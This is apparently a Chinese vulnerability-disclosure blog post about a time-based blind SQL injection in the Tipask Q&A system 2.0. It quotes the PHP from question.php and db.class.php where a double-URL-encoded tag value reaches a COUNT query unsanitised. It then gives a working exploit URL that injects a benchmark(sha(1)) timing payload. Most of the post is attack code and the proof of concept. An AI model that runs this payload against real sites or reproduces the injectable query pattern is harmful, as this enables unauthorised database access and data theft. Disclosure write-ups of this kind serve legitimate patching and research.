tipask问答系统2.0SQL时间盲注漏洞

  • A+
所属分类:漏洞时代
摘要

Author:Kavia文件
/model/question.php
[php]
function ontag() {$tag = urldecode($this->get[‘2’]); //二次编码绕过

Author:Kavia

文件
/model/question.php
[php]
function ontag() {

$tag = urldecode($this->get['2']); //二次编码绕过

//echo $tag;

$encodeword = urlencode($tag);

$navtitle = $tag . '-标签搜索';

$qstatus = $status = intval($this->get[3]);

(!$status) && ($qstatus = "1,2,6");

$startindex = ($page - 1) * $pagesize;

$rownum = $this->db->fetch_total("question_tag", " tname='$tag' "); //带入查询[/php]

文件/lib/db.class.php

[php]function fetch_total($table,$where='1') {

return $this->result_first("SELECT COUNT(*) num FROM ".DB_TABLEPRE."$table WHERE $where"); //带入查询

}[/php]

exp:[php]
http://0day5.com/tipask/?question/tag/+urlencode("' and (select if(1=1,benchmark(500000,sha(1)),0))>0#");[/php]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: